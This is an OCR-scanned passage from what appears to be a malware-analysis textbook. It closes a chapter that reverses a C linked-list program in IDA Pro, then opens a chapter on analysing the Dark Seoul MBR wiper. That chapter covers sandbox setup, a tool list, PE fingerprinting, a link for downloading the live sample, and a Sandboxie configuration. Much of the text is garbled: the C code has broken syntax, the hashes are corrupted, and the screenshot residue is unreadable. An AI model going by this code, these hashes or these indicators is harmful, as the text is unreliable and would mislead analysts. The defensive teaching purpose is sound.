void * data; 
struct node *next; 


} Node; 


typedef struct linkedList { 


Node *head; 

Node *tail; 

Node *current; 
} LinkedList; 


typedef struct malwareinfo{ 
int sno; 
char name[40]; 
char hash[70]; 
}MalwarelInfo; 


void resetLinkedList(LinkedList *list) { 
List->head =NULL; 
List->tail =NULL; 
list ->current = NULL; 


void appendToHead (LinkedList *list, void 
“inte )y) + 


Node *node=(Node *)malloc 
(sizeof (Node) ); 
node->data =info; 
if (list->head == NULL) { 
list->tail =node; 
node->next =NULL; 


yelse { 

node->next = list->head; 
if 

list->head = node; 


void renderInfo(MalwareInfo *maL){ 
printf("%d, %S, %S\n",mal->sno,mal- 
>name,mal->hash) ; 


} 


void traverseList(LinkedList *list) { 
Node *seeker = list->head; 
while(seeker!=NULL) { 
renderInfo( (MalwareInfo*) seeker- 
>data); 
seeker =seeker->next; 


}} 


int tmain(int argc, _TCHAR* argv[]) 
{ 


LinkedList lister; 


MalwareInfo *mall=(MalwareInfo *)malloc 
(sizeof (MalwareInfo) ); 
MalwareInfo *mal2=(MalwareInfo *)malloc 
(sizeof (MalwareInfo) ); 
MalwareInfo *mal3=(MalwareInfo *)malloc 
(sizeof (MalwareInfo) ); 


mall->sno=1; 

strcpy(mall->name, "reginl") ; 

strcpy(mall1- 

>hash, "4d6cebe37861ace885aa00046e2769b500 
084cc79750d2bf8cle290alc42aaf Ff") ; 


mal2->sno=2; 

strcpy(mal2->name, "regin2") ; 

strcpy (mal2- 

>hash, "4e39bc95e35323ab586d740725alc8cbcd 
e01fe453f7c4cac7cced9a26e42cc9") ; 


mal3->sno=3; 

strcpy(mal3->name, "regin3") ; 

strcpy (mal3- 

>hash, "5c81cf8262f9a8b0e100d2a220F7119e54 
edfc10c4fb906ab7848a015cd12d90") ; 


resetLinkedList(&lister) ; 
appendToHead(&lister,mall) ; 
appendToHead(&lister,mal2) ; 


appendToHead(&lister,mal3) ; 


traverseList(&lister); 


getchar(); 


return 0; 


} 


The output is as follows: 


3, regin3, 
5c81cf8262f9a8b0e100d2a220f7119e54edfc10c 
4fb906ab7848a015cd12d90 

2, regin2, 
4e39bc95e35323ab586d740725alc8cbcde01fe45 
3f7c4cac7cced9a26e42cc9 

1, reginl, 
4d6cebe37861ace885aa00046e2769b500084cc79 
750d2bf8cle290alc42aaf f 


Notice how the output is the reverse of the input 
sequence. In the preceding source code, we have 
described a struct for the Node and the 
LinkedList data structures. We have also 
defined a MalwareInfo struct to hold an example 
data structure to be inserted into the list. To 
initialize the linked list, we have a 
resetLinkedList function that basically sets all 
the linked list members to NULL or makes an 
empty list. The appendToHead function takes a 
list pointer and a void pointer to a data structure, 
which is used for casting any data type through 
the function. Here, a Node type is allocated in 
memory by using malloc, and the data member 
of the node is set to point to the address of the 
information parameter, which itself holds the 
address of the contents of the list data structure. 
If the list is empty, the List->tail member 
points to the node and node->next is set to 
NULL. If the list is not empty, then node->next 
points to List->head. Finally, List->head points 
to the node. Done this way, the linked list acts 
like a stack where list->head points to the last 
inserted node. Upon regular traversal from the 


start of the list in the traverseList function, 
which takes the list pointer to the structure, as a 
parameter uses the node->next member to find 
out the last node that points to NULL, you end up 
reading from the head, which is the last node 
inserted and hence, the data structure that it 
points to, thus giving a reverse data sequence 
output. Open the executable debug build in IDA 
Pro and navigate to the wmain function to enter 
the following instructions; note that the 
addresses might be different on your system: 


var F8= byte ptr -OF8h 

mal3= dword ptr -34h 

mal2= dword ptr -28h 

mall= dword ptr -1Ch 

lister= linkedList ptr -10h 
argc= dword ptr 8 

argv= dword ptr O0Ch 


IDA Pro analyzes the code and displays the 
offsets where the local variables and parameters 
are accessed in the disassembly, which helps in 
making the disassembly readable. Here, mall, 
mal2, and mal3 are 12 (Ch) bytes apart in the 
stack. 


.text:00413810 push 
74h ; Size 

. text :00413812 call 
ds: imp malloc 

. text :00413818 add 
esp, 4 


The size 74h or 116 decimals is the compiler- 
calculated byte-padded value for the struct size 
of MalwareInfo, which is 4+ 40+ 65 bytes. 
After the call to malloc, eax holds the address of 
the allocated region on the heap: 


. text :00413822 mov 
[ebp+mall], eax 


text :00413825 mov 
eax, [ebptmal1] 
text :00413828 mov 


dword ptr [eax], 1 


Preceding is the value of the first member of the 
mall structure, and the serial number 
abbreviated as sno is set to 1, as in the source 
code: 


. text: 0041382E push 
offset Source 7 regime: 

. text : 00413833 mov 
eax, [ebpt+mall1] 

. text : 00413836 add 
eax, 4 


Since the size of an integer data type in a 32-bit 
x86 machine and in Windows is 4 bytes, 4 is 
added to the start of the structure offset at eax 
to store the "regin1" name string, which will 
take up upto 40 bytes of allocated character 
space. This is the destination address that acts 
as a parameter to strcpy: 


. text: 00413839 push 
eax ; Dest 

. text :0041383A call 
j__strcpy 

. text :0041383F add 
esp, 8 

. text: 00413842 push 


offset a4d6cebe3786lac ; 
"Ad6cebe37861ace885aa00046e2769b500084cc" 


. text :00413847 mov 


eax, [ebptmal1] 
text :0041384A add 
eax, 2Ch 


2Ch or 44 is added to eax to move to the hash 
member storage area in the struct in the 


memory; this is calculated as the offset including 
the first and second members of the structure: 


. text: 0041384D push 
eax ; Dest 
.text:0041384E call 
J stropy 

. text: 00413853 add 
esp, 8 


You can see the layout in the memory in the Hex 
view by pressing Gand typing the address of the 
malloc buffer in eax into the dialog box in IDA 
Pro: 


007072B8 01 00 00 00 72 65 67 69 GE 31 
00 CD CD CD CD CD ....reginl.----- 
0070728; “CD CDCR Cb: Ch CD CD CD. Che cp 
CD CD CD CD CD CD_ ---------------- 
00707208 CD CD CD €b CD CD CD Cb Cb cb 
CD CD 34 64 36 63 ------------ 4d6c 
OOFO7TZES 65 62) 165 33 37 32 3631 61 63 
65 38 38 35 61 61 ebe3786lace885aa 
OO7072E8 30 30 30 34 36 65 32 37 36: 39 
62 35 30 30 30 38 00046e2769b50008 
00707308 34 63 63 37 39 37 35 30 64 32 
62 66 38 63 31 65 4cc79750d2bf8cle 
O0707318 (32 39) 30°61 31°63 34.32 61°61 
66 66 00 CD CD CD 290alc42aaff. --- 
00707328 CD CD CD CD FD FD FD FD AB AB 
AB AB AB AB AB AB_ --- -222243333343% 


The extra CDh bytes towards the end of the 
structure are the padding bytes. 


The preceding sequence continues for the mal2 
and mal3 data types: 


. text: 004138E6 lea 
eax, [ebpt+lister] 

. text :004138E9 push 
eax Pealloheye 

. text: 004138EA call 


resetLinkedList( linkedList *) 


EAX is then set to Lister and is passed to the 
resetLinkedList function. Entering this 
function, we find that the main lines of interest 
are as follows: 


.text:012813FE mov eax, [ebp+list] 
.text:01281401 mov dword ptr [eax], 0 
.text:01281407 mov eax, [ebpt+list] 
.text:0128140A mov dword ptr [eax+4], 
0 

.text:01281411 mov eax, [ebp+list] 
.text:01281414 mov dword ptr 
[eax+8] ,0 


The members of the list structure are 4 bytes 
apart (pointer data type), and the offset is 
calculated from the base of the structure and is 
set to 0 (NULL): 


. text :004138F2 mov 

eax, [ebpt+mal1] 

.text:004138F5 push 
eax ; data 

. text :004138F6 lea 

ecx, [ebpt+lister] 

. text :004138F9 push 
ecx 2 St 

. text :004138FA call 
appendToHead( linkedList *,void *) 

. text :004138FF add 

esp, 8 


Now, enter appendToHead: 


.text:01281460 push 8 ; 
Size 
.text:01281462 call ds: imp malloc 


The Node instance is created with the malloc 
parameter value of 8 as there are two pointer 
types in Node: 


.text:01281472 mov [ebpt+node], eax 


.text:01281475 mov eax, [ebp+node] 
.text:01281478 mov ecx, [ebp+data] 
.text:0128147B mov [eax], ecx 
.text:0128147D mov eax, [ebp+list] 
.text:01281480 cmp dword ptr [eax], 0 
.text:01281483 jnz short loc 128149A 


eax and ecx are set to node and data, and the 
data member of Node is set to the information 
parameter. Finally, the list head is checked for 
NULL and if the condition is false that is the list 
is not NULL, then the following is obtained; notice 
how the condition set in the source code is 
compiled to its Boolean opposite in the assembly 
code: 


.text:0128149A mov eax, [ebp+node] 
.text:0128149D mov ecx, [ebp+list] 
.text:012814A0 mov edx, [ecx] 
.text:012814A2 mov [eax+4] ,edx 


eax is set to the node and ecx to the list. The 
value pointed to by the list head is copied to edx 
and edx is copied to node base offset + 4 or 
node->next member. 


Now, assume that the condition is true or the list 
is empty: 


.text:01281485 mov eax, [ebpt+list] 
. text:01281488 mov ecx, [ebp+node] 
.text:0128148B mov [eax+4],ecx 


eax and ecx are set to the value contained at the 
base offsets of the list and node structures. The 
dereferenced node address gives the data 
pointer of the start of the MalwareInfo structure 
referenced by the node. This value is copied to 


the list tail member, and the node's next 
member is set to 0 or NULL. 


.text:0128148E mov eax, [ebp+node] 
.text:01281491 mov dword ptr 
[eax+4],0 

. text: 00413926 call 
traverseList(_linkedList *) 

. text :0041392B add 
esp, 4 


Can you analyze the rest in IDA Pro and try to 
figure out how the traverseList function works? 
Tip: Remember how NULL is represented in 
disassembly. 


Summary 


You have seen the myriad ways in which we can 
work with assembly language programming and 
disassembly analysis in the Windows 
environment by using VC++ IDE. Understanding 
the tool chain and the operation modes, as well 
as proper configuration is paramount to 
facilitating a proper programming process. You 
have seen how each line in the disassembled 
code of a compiled binary can be deconstructed 
and a sample of how both high-level logic and 
opcode-level analysis can be investigated. You 
will be doing more assembly programming and 
analysis as we progress with the material. With a 
sound introduction to the fundamentals, you can 
now explore disassembly for malware in the next 
chapter for a static analysis, which has a 
tendency to be quite convoluted. 


Chapter 3. Performing 
a Seance Session 


Apprehending malware red-handed is a very 
exhilarating feeling for an analyst. Debugging 
technology provides a wealth of information 
about a malware's inner construction and layout, 
and, most importantly, its modus operandi. You 
can take the metaphor of an ultra-high-speed 
camera used to capture a slow motion video of a 
moving bullet that plots its trajectory as a 
projectile, which hits its intended target and the 
effects thereof, and compare that with a 
debugger used to capture the execution trace of 
a malware instruction by instruction. Things are 
seldom that simply extrapolated, and hence you 
could also compare an analysis session as a 
criminal interrogation (analyst/debugger/target 
sample) in a Spook black-site (sandbox) where 
you have the liberty to extract information in any 
manner you want, while dealing with the myriad 
obfuscations, retaliations, and unwillingness of 
the participant. 


The primary methodologies in malware analysis 
are static and dynamic analysis, with the terms 
static and dynamic having dual overtones to 
their definition for our purposes. Static analysis 
can denote investigation of the executable 
format or the overall container of the binary code 
(as in other kinds of malware such as 
PDF/js/flash/HTML malware containing exploits) in 
order to identify anomalous attributes that will 
help in further investigation. This usually 
involves fingerprinting the malware, or its 
container and its various sections (figuratively 


and as per the PE format, literally), as well as 
scanning for outstanding executable format 
properties that point toward anything malicious. 
Static analysis also supports the act of reading 
assembly code extracted by a disassembler, 
which is analyzed manually by the analyst or 
using an inbuilt or integrated emulator without 
actually executing the malware in any major way. 
The exploit shellcode and in-disassembler 
unpacking can be analyzed, exposed, and made 
redundant without resorting to immersion and 
execution of the malware sample in the ideal OS 
environment. Emulator automation and 
debugging scripts can be written and deployed 
as the next steps in the tool or framework of your 
choice to assist in such excursions. 


Conversely, dynamic analysis can represent 
manual debugging of the malware sample in a 
debugger, mostly in tandem with reading 
assembly code in a debugger. The dynamic 
session can also typify using a sandbox 
specifically engineered to automatically monitor 
the interactions of the malware on execution, 
with the OS environment and the outside world, 
to give an eagle eye view of the gathered 
information that acts as a fast-track malware 
analysis procedure. 


Many if not all of the malware are obfuscated, 
compressed, or encrypted with creative 
techniques (or plagiarizing) implemented by the 
malware authors. Analyzing a malware ina 
debugger while exacting and precise can often 
become time consuming, which is sometimes 
more of a luxury than you can afford, and hence 
techniques such as sandboxing are in vogue. 
Both processes function as a trade-off in time 
required and the information procured. On the 


contrary, when used in tandem, they provide 
supporting evidence for each other further 
strengthening the investigation. 


In this section, we shall see the process from the 
perspective of an analyst session and how he/she 
might use the myriad tools and techniques in the 
process to best find what the malware sample 
does in the fastest time possible. 


From this chapter, you will learn how to: 


e Use analyst tools to perform detailed investigation of an 
MBR overwriting malware sample and create your own 
Yara signatures 


- Leverage setting up a virtual machine or emulator 
software for dynamic analysis 


Understand how extracted details can be presented as a 
final report 


Fortifying your 
debrief 


Before we start with the analysis, let's explore our 
reporting tool Scrivener from Literature and 
Latte. This is quite a deep tool and you are 
recommended to visit their website at 

http://www. literatureandlatte.com/scrivener.php. 


This amazing software is more popular with 
literary types (aka novelists and writers, many 
well-known names too) and academics, and not 
so much widespread within the computer 
security community. Some of the well-distributed 
tools for security research include MS Word, 
Notepad++, Ultra Edit, FreeMind, and Dradis 
among a slew of other text editors and such. 
However, it is strongly recommended that you 
use Scrivener for reasons that will become 
apparent the moment you start using it. Some of 


the useful features are a hierarchical note 
repository called Drafts managed in a Binder 
toward the extreme left which is a metaphor for a 
book binder with notes. You also have Research 
folder inside the Binder. The Drafts and 
Research components cannot be deleted. There 
is another metaphor called a corkboard that 
displays chapters as index cards. You fill data into 
the cards using the Inspector. You can use 
inbuilt utilities to capture the screen and import 
documents, PDF files, and images into the 
Research folder. You can open multiple views and 
watch them vertically or horizontally and build 
your analysis. File export is a major plus with 
your Scrivener projects compiling to .docx, 
.epub, and various e-book formats that work 
easily. You can work with the available templates 
and publish your work immediately or set word 
goals and work toward finishing each component 
of a report. 
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If you have had the privilege of visiting malware 
labs in and around Europe and Middle East, you 
will observe another tool in vogue—Total 
Commander (http://www.ghisler.com/). This 
behemoth of a file manager utility for Windows 
deserves a mention as it does everything you 
can possibly expect from working in an 
environment—packing/unpacking features, 
persistent multi-file selections, bulk renaming, 
regex search, inbuilt editors and plugins, and 
remote FTP connections among others, and the 
ubiquitous dual pane explorer panes along with a 
huge set of features make this a pleasure to work 
with during malware analysis sessions. File 


organization and management is of paramount 
priority when dealing with hundreds of samples 
at a time and Explorer.exe just does not cut it. 
You must have this tool in your arsenal. 
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Debriefing - seeing 
the forest for the 
trees 


The malware sample of choice is called Dark 
Seoul. You can get the sample from 
http://contagiodump.blogspot.in/2013/03/darkse 
oul-jokra-mbr-wiper-samples.html. 


This malware is chosen for this chapter as it is 
relevant enough to be featured in a number of 
news reports and advisories—http://blog.xecure- 
lab.com/2013/03/lets-gossip-what-happens-in- 
south-korea.html and 
http://www.secureworks.com/cyber-threat- 
intelligence/threats/wiper-malware-analysis- 
attacking-korean-financial-sector/. It is also widely 
available and the features are quite interesting 
without being overly complex for the purpose of 
learning malware analysis. Since most books 
focus on concepts and techniques in isolation, 
getting an idea of top-to-bottom analysis can be 
daunting for beginners and even experienced IT 
folk who do not regularly deal with malware 
attacks. This chapter will help in consolidating 
many of the individual parts of an analysis 
session. Demystifying the process is a primary 
benefit of lowering the bar for new learners and 
experienced first timers alike, and even regular 
analysts can gain from the instructional 
commentary approach as well as analyze the 
malware and online advisories on their own prior 
to reading the rest of the chapter. 


Preparing for D-Day - 
lab setup 


When you procure a malware sample from 
various sources such as honeypots, or online 
repositories, or an infected machine, your first 
task is to transport it to an environment where 
the malware can be observed in action without 
harming any real-world computer system and 
especially via network communication or 
propagation. This is normally called a sandbox or 
a malware lab and should be set up prior to 
analysis. 


Dedicated computer hardware can certainly be 
used for this purpose, though a better solution 
would be to use virtualization or emulation. The 
dividends are rich and multivalent—you recoup 
on the price of real computer hardware and OS 
backup software while you capitalize on features 
such as snapshots, persistent disks, host only 
networking, kernel mode debugging over named 
pipes, and running multiple OS versions on the 
same hardware. 


VMWare and VirtualBox are two virtualization 
software that can be leveraged in such a setup. 
For our purposes, this would be simple to 
configure as we will be performing manual 
analysis on a malware sample with third-party 
tools on Windows XP as the test platform. We will 
focus on VMWare for this analysis session. The 
current slew of malware tends to focus on the 
Windows NT systems, and XP after being 
discontinued is still used a lot but lacks much of 
the current bevy of security features and hence 
is a better choice for unhindered malware 


execution. It is, however, advisable to execute 
malware in recent OS versions as well like 
Windows 7 and 8 in order to trigger and observe 
environment-specific payloads and confirm and 
understand their mechanisms. 


The current crop of malware has employed many 
creative anti-virtualization tricks that may hinder 
your analysis. There is always a risk that the 
virtual environment can be detected by the 
malware or the malware escapes the 
containment. Be prepared for this and try to 
learn about VM detection mechanisms by reading 
about such documented malware so that you 
have something to fall back on. Employing an 
airtight isolation like running VMware in Linux 
adds another layer of defense, especially when it 
comes to Windows malware. 


You set up a Windows installation using the 
installation disk or an ISO file of the Windows XP 
SP2 disk. VMWare will ask for the product key 
and installation will commence. Once done, 
VMWare tools will be installed by VMware after 
which additional features such as Guest 
(virtualized OS) and Host (hosting hardware 
machine that runs VMWare) bidirectional copy- 
and-paste and drag-and-drop will be enabled 
along with shared folders and better video 
response and peripheral devices handling. 


VMWare provides for four networking modes— 
Bridged, NAT, Host-only, and Custom. You will 
use Host-only (VMNet1 by default), which will 
enable the Host to communicate with the Guest 
OS (and Guest-to-Guest intranet) exclusively. NAT 
(for network access with shared host IP and other 
services such as VPN) and Bridged (for direct use 
of the host network hardware and physical layer 


wire sniffing of virtualized OS network 
interactions) can also be used as available 
presets. 


A useful feature to use in VMWare is non- 
persistent (persistent by default) disks, which 
can be very useful in removing any trace of 
malware from a baseline as nothing in the 
running state is preserved in the next boot. This 
is an inbuilt alternative to tools such as Deep 
Freeze (http://www.faronics.com/en-uk/). 
Snapshots are also a valid facility for achieving 
the same set of goals. However, caveat emptor, if 
you want to save different snapshots to go back 
to specific parts of the analysis, then keeping the 
disk non-persistent will not allow you to do so, 
which is what you might prefer, or not, so just so 
that you keep this in mind prior to 
commencement of analysis. Take a baseline 
snapshot after all tools are installed and revert to 
it to restart analysis. Take subsequent snapshots 
if you want to save at a particular point during 
the analysis session and want to resume back to 
ite 


You can copy the following tools to VMware 
Windows Desktop or to a folder location of your 
choice. 


Whippin’ out your 
arsenal 


Let us see the list of tools that we will be using or 
referring further. 


Fingerprinting 


PEiD/Exelnfo: https://tuts4you.com/download. php?list.37 


FileAlyzer (with ssdeep.dll for ssdeep hashes): 
http://www.safer-networking.org/products/ 


HeaventoolsPEExplorer: http://heaventools.com/ 


Yara: https://code.google.com/p/yara- 
project/downloads/list 


User mode sandboxing 


BSA Buster Sandbox: http://bsa.isoftware.nl/ 
Sandboxie: http://www.sandboxie.com/ 


Cuckoo Sandbox: http://cuckoosandbox.org/ and 
www.malwr.com 


VMWare: http://www.vmwareinc.com/ 


Debugging and disassembly 


OllyDBG 1.10/2.0: http://www.ollydbg.de/. 


IDA Pro 6.1 or above: http://www.hex- 
rays.com/products/ida/index.shtml. 


Debugging Tools for Windows(x86): This requires 
installation. It is available at http://www. microsoft.com/en- 
us/download/details.aspx?id=8442. 


Bochs 2.4.6: 
http://sourceforge.net/projects/bochs/files/bochs/2.4.6/. 


Monitoring 


Sysinternals Suite (especially process explorer and 
process monitor): https://technet.microsoft.com/en- 
us/sysinternals/bb842062.aspx 


FakeNet: http://sourceforge.net/projects/fakenet/ 


- ProcDOT: 
http://procdot.com/downloadprocdotbinaries.htm 


¢ API Monitor: http://www.rohitab.com/apimonitor 


- Win32 Override: 
http: //jacquelin. potier. free.fr/winapioverride32/index.php 


MISC 


- 010 Editor: http://www.sweetscape.com/010editor/ 
e WinHex: http://www.winhex.com/winhex/ 


- HxD Editor; hex editors with MBR reading facility: 
http://mh-nexus.de/en/hxd/ 


- MSDN via Internet: http://msdn.microsoft.com/ 


You are also free to include older reversing tools 
such as HIEW and W32DAsm if you so wish. 


Next steps and prerequisites 


Most of the tools listed are for free and you can 
skip some of the commercial tools if you do not 
have them yet. The alternatives are already 
discussed in the previous chapter. 


Set the %PATH% environment variable by copying 
the full image paths of the binary folder for the 
Sysinternals folder and the installed tool 
directories of OllyDbg, IDA Pro, Buster Sandbox, 
and the editors. This is so that CMD.EXE can be 
invoked and the executable names can be typed 
in to launch the applications. You can also create 
Windows shortcuts on the desktop or pin them to 
Start menu items. 


You will be using OllyDbg 1.10 for this session, 
though much of the above can be done in IDA 
Pro using Windbg or Bochs debuggers as the 
tools of choice. Using these debuggers can be 
chosen from the Debug | Switch Debugger 
menu items in IDA Pro. IDA Pro will automatically 
find Bochs and Windbg. Only the x86 version of 
Windbg and older version of Bochs work with 


latest versions of IDA Pro. We will explore 
emulation and other techniques in later chapters. 
BSA Sandbox can be configured as per the help 
file in the BSA installation and will consist of 
appending a few lines regarding the location of 
BSA files and other options into the Sandboxie 
config file. Please read the friggin’ manual (RTFM) 
for each of the tools, which, for some reason, is 
one of the most violated principles with any new 
tool installation. 


A general rule of thumb in malware analysis—be 
skeptical of everything just as in a real life 
investigation, everybody is a suspect until 
proven otherwise and keep testing hypotheses 
and draw inferences. The process of elimination 
and due diligence always pays in the end. 


To paraphrase Mark Twain: 


"It ain't what you don't know that gets you into 
trouble. It's what you know for sure that just ain't 
so." 


As a prerequisite, get acquainted with 
underground cracking concepts such as code 
caves, serial fishing, imports table reconstruction, 
PE header rebuilding, memory dumps, patching, 
memory trainers, basic encryption analysis and 
decryption, keygenning, keyfiles construction, 
writing binary format parsers, basic debuggers, 
developing tools/utilities, and other basic reverse 
engineering concepts, so that malware analysis 
will not stump you. Hardware dongles and other 
DRM-based protectors are fine specimens to push 
your skills to the limit and most malware (In The 
Wild (ITW)) does not employ such commercial 
tactics (yet ... but, of course, bootkits and other 
manufactured in-hardware malware by agencies 


in question sort of come creepily close). But that 
leaves other things to focus on such as signature 
creation, packet trace analysis, high-level 
analysis tools, and detection research and 
development (development of custom 
disassembler engines, unpacker frameworks, 
decompilers, sandboxes, and visualization tools 
among others), which can be very demanding 
and interesting at the same time. Another tip 
regarding analyses using tools is to be judicious 
of their use (especially first timers). While 
learning the ropes, you are free to experiment 
with everything and even after for that matter, 
but there is no rule that says you have to use 
every tool in the arsenal at every analysis just to 
feel complete about it (everything and the 
proverbial kitchen sink). If you have done an end- 
to-end analysis and you feel that a specific tool 
can help evaluate something better, then by all 
means go for it, but not just for the sake of it 
(like a doctor prescribing every medicine 
available for a particular disease—"let's see which 
one works!"). There is a difference, and as time 
passes with study and experience, you will learn 
to streamline your toolkit and implement them as 
required. There is no step-by-step guide to 
malware analysis as every case is different 
though the overall approach and the tools can be 
learnt very effectively. 


Summoning the 
demon! 


Let us go about the steps to performing full 
analysis. 


Step 1 - fingerprinting 


Most of the time, you will need more information 
from the binary sample itself, or if you work with 
a memory dump, you will need to extract the 
binary executable or build it from there, so either 
way you will need to canvas the PE format and its 
dimensions and look for obvious and not so 
obvious signs of maliciousness. This information 
can be utilized for signature creation and other 
detection rules and will often be precursors and 
addendums to Indicators of Compromises 
(lOCs). 


The particulars that can help in identification and 
cataloging of malware databases include hashes, 
packer/compression/armoring employed and 
their nomenclature and markers, section names, 
section virtual, and raw sizes and address, import 
and export tables, other compiled data directory 
structures such as TLS/debug directory/base 
relocation tables among others, section hashes, 
entropy(s), and overlays, among others. You 
must be on the lookout for anomalies. 


You can also utilize https://www.virustotal.com/ 
and similar services to gather detection 
information from other sandbox and antimalware 
vendors. 


Let's collate the available information as the 
header (Sample shown in the following part, how 
you arrange text and graphics in a report 
depends on the house rules of your employer or 
upto your own artistic license) of the report using 
FileAlyzer and https://www.virustotal.com/: 


Malware Name — Dark Seoul 

CRC-32: Cyclic redundancy check, 32 bit: 
68AE9795 

MD5: Message-Digest algorithm 5: 
DB4BBDC36A78A8807AD9B15A562515C4 

SHA-1: US Secure Hash Algorithm 1: 
309AF225AC59E1D2FFAADA11E09F5715BCE16C1E 
SSDeep: 

192 : Ov5uXGwnkG jG LCdhAtNvIQszEtTmhVYWYO2no0 
M1qtT57MkIRVtyycpc7numoZ9: E5uXGw/CLCTEZ3W 
NDMEN5yycpcrumoZ 


dviustotal 


SHAD: Ta HEQGA7EfcTSe7970S3SbacladOO0520702437Sn6%cQdcOct3 ta 
Flename — ApcRunCmd. OB4BBDC2o47BASG0TAD9E 5460251604 


Detection rato: 5156 613 6; 


Analysis date: 201540227 0557-13 UTC (3 ees, 6 days ago 
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Antivirus Result date 
ALYae Trojan Kish HBR Qnst228 
ANG Agent AKHE Dns228 
AVware Trojan ind Genet BT AN6N8 
AtsAvare Than Genet KD. 908590 AN6l228 
Agnitum TrjanEraseMBRI+BlnOqG HT 48 nslzes 


Drag and drop the binary sample in PEiD and 
Exeinfo. You will observe that the file is not 
packed. PEID, while being excellent, is not 
Supported anymore, hence a double-check with 
Exeinfo, which is still being actively maintained. 





ne PEID v0.9 


File: {C:\Users\user\Desktop \Dark Seoul|DarkSeoul_DB48BDC36A78A8807! |... | 


Entrypoint: {00001000 EP Section: | text 
File Offset: (00001000 First Bytes: | 55,8B,EC,83 
Linker Info: | 6.0 Subsystem: | Win32 GUI 


| ‘Win32 PE Unknown 


Multi Scan Scan | Task Viewer | tions _| [__About _| oa 


; ¥ Stay on top 








Exeinfo offers an eerily similar interface and 
feature set to PEID. In the following exhibit, we 
get more information about the compiler that the 
malware is compiled with. There are additional 
deeper features such as entropy analyses, crypto 
analysis, and overlay information, for instance, 
that are comparable in both of the tools, and it is 
wise to explore them as you investigate and 
search for things of interest. You are advised not 
to use the generic unpacking options here as the 
malware may execute its payloads unhindered, 
which will stall your session. Feel free to 
experiment and play with the additional features. 


WH Exeinfo PE-ver.0.0.1.6C (248 sign.) 2007.06.21 - © 


File :| DarkSeoul_DB4B8DC36A78A8807AD9B 15A562515C4 ” 






Entry Point: 90001000 00 EP Section : | text ie Se 
ae File Offset: 00001000 First Bytes : |55.8B,EC.83.EC) | - Plug 
Linker Info: 6.0 SubSystem : \Win32 GUI About | 
File Size: 00006000h Overlay: NO 00000000 
Options 
Image is 32bit executable 
Microsoft Visual C++ ver. “6.0~7.0 - date : 2013 Exit 


Lamer — — = 








Open the malware sample in PEExplorer. Observe 
relatively normal PE file features. What is normal? 
You have to read the specification and analyze a 
lot of files, both visually and analytically, and the 
duo of benign and malicious to establish a strong 
sense of what can be possibly malicious binary 
files. Malformed and corrupted PE files, as well as 
overly obfuscated and packed binaries, are dead 
giveaways—their section names and values are 
usually way off. This malware has three sections 
with normal compiler names. VA and raw values 
are also in range and look valid prima facie. 
Section .rdata contains the import tables. 


Took Heb 
HAM OE) Se 4] 8GRe8 |» 


ieectRawData PointertoRawData Charactelics | Pointing Directories 
oozrcéh AO4oTOdCh © 0003000, »~—»- ADOT E0000020h 
o07iéh © O040400dh © O000T00dh »=—»»«=«oOdONch 40000040h Import Table; Import Adcese Table 
oo7sch —0040E00Ch © 000TH »——ANNRD CO000040h 

















Plas 


Rall | 08 Gt @2 63 04 85 86 87 —————EEEE 08 G9 GA GB GC GD GE GF | 





TFU-TEXTEX. RAW Sice: [RAW Sie OOUGIOh; iudSze OUI «= Virtual Sie: OOO027CEh 
© Section is pointed aa [Cart be deleted), 
© - Section is pointed to by Data Directons (May be delete, 
© Section has no reference (May be deleted), 








We see that the malware sample imports only 
one system dil—Kernel32.dL1l with the listed 
import functions. Keeping a track of the number 
of satellite binary modules and their imported 
and exported functions gives an indication of 
possible malware functionality or at least what it 
appears to be as in this case, though this can be 
very misleading as there are a myriad of ways 
that modules can be loaded when the malware is 
running. 





A good feature in PEExplorer is the Syntax 
Details pane, as shown in the following 
screenshot, and can be helpful for getting an 
overview of each Win32/Native API function in 
Windows if so required: 
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Continuing the imports list: 
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The PE headers hold a wealth of information 
relevant to the PE format of the malware binary 
and the following exhibit displays the tabular 
format of the exploded header, as well as the 
characteristics bit field's flag values that are set. 
This is essential to ascertain whether the file is a 
dll or an executable among other parameters. 
Time stamp and checksum values as well as the 
subsystem field can be noted down. Other 
important fields are Size Of Image, Address of 
Entry Point, and Image Base. If you check, 
they all line up to be part of a valid and well- 
formed PE binary. 


You can see that the malware binary is a 
Windows GUI program (or so the malware wants 
you to believe), which has a valid machine 
signature, 0x014C and magic value, 0x010B. But 
if you look at the imports, there is no GDI32.dIl or 
USER32.dll in place. So, this might be an 





indication of a subversive infection where the 
analyst never sees any Windows form of any 
kind, or if it does, the dll modules are loaded 
dynamically. Additionally, the resources section is 
totally absent, without even version strings, 
which, in a regular executable GUI file, would be 
particularly odd and hence raises suspicion. 
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Strings can be a finicky thing to extract with 
some tools, and in this particular example, 
PEExplorer did not extract all of the strings 
properly. Both ASCII and UNICODE strings are 
extracted and are shown in the following exhibit. 
Many atime, malware writers will abstain from 
leaving hardcoded IP addresses, passwords, or 
keys in a binary and generate/decrypt them at 
runtime, and those strings can be obtained only 


by detailed debugging sessions or packet 
captures, which can then be further analyzed. 
The moral of the story is do not ever rely on only 
one tool when it comes to reverse engineering as 
every tool has its own pros and cons (and know 
the cons, more importantly! ). Paying due 
diligence will help you sharpen your analysis 
focus and save time and prevent headaches later 
on. 
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Step 2 - static and dynamic 
analysis 


At this point, you can use either IDA Pro with 
Bochs debugger, Windbg debugger, or even the 
local Win32 debugger and start intelligently 
tracing through. Using Bochs debugger has the 
advantage of emulating the hardware, so you will 
not have to explicitly use a virtual machine 
unless you suspect that the malware might run 
outside the Bochs (pun intended). Also, a lot of 
boot code and MBR-related debugging is best 
done with this very useful emulator. However, 
you will use OllyDbg for this session and you are 
encouraged to try out similar results with the 
above configurations. 


Using BSA Buster Sandbox Analyzer a priori to 
the manual runtime analysis should give an 
overall idea and a few pointers to IOCs. In 
general, it is a good idea to run a malware a 
couple of times in a monitored environment so 
that the runtime trace can provide an immediate 
profile of the overall functionality of the malware. 
The config file Sanboxie. ini accessed through 
Configure | Edit Configuration needs to be 
edited to add the following lines (change the 
path of the BSA directory as required). BSA itself 
is a portable application that extracts to a folder 
and can be run directly. 





Pf Sandboxie.ini - Notepad 
File Edit Format ‘Yiew Help 
[Globalsettings] 
Template=wacomTablet 


[DefaultBox] 


Cconfiglevel=7 
AutoRecover=y 

Temp] ate=windowsFontcache 
Temp late=BlockPorts 

Temp ]ate=LingerProgr ams 


Templ]ate=Cchrome_Phishing_Directaccess 
Temp late=Firefox_Phishing_Directaccess 
Temp ]late=AutoRecoverlIgnore 
RecoverFolder=*Personal% 
RecoverFolder=%Favorites% 
RecoverFolder=*besktop% 
Bordercolor=#00FFFF,tt1 


API\LOG_API32.DLL 


[UsersSettings_4Bc00582] 





You can set up BSA in FakeNet mode just in case 
